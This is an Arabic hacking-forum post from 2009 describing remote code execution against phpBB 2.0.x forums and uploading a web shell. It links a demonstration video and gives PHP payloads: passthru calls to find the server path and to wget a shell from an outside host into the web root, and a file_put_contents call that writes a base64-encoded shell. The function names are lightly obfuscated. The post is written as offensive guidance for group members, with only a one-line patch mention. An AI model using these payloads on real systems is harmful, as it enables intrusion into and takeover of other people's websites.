عرض مشاركة واحدة
قديم 04-30-2009, 03:09 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
SkRtaR
 
الصورة الرمزية SkRtaR
 

 

 
إحصائية العضو





SkRtaR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
SkRtaR is on a distinguished road

افتراضي [فيديو] استغلال قاعدة بيانات phpbb ورفع شل


اسم الثغرة : Remote Code Execution
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ

سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه


التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar


هدية خاصة للعناكب..


بدائل عن ماحقن بالتطبيق :

كود PHP:
passthr.u('pwd'// كأول مرة, للتعرف ع المسار
passthr.u('wget site.com/shell.php -O /path/shell.php')  // لسحب الشل ع هالمسار 
طريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :
كود PHP:
file_put_conten.ts('/path/shell.php',base.64_decode('encode shell here')); 
والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها


اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث


ThE End

Bay Bay ... $ee y0u


Ftd]d,D hsjyghg rhu]m fdhkhj phpbb ,vtu ag

التوقيع

[img]http://www.m5zzn.com/upload/uploads/m5zzn
-ba6dee59b2.jpg[/img]




SkRtaR


SpiDerS

fiRseT

SpiDer 4 eVeR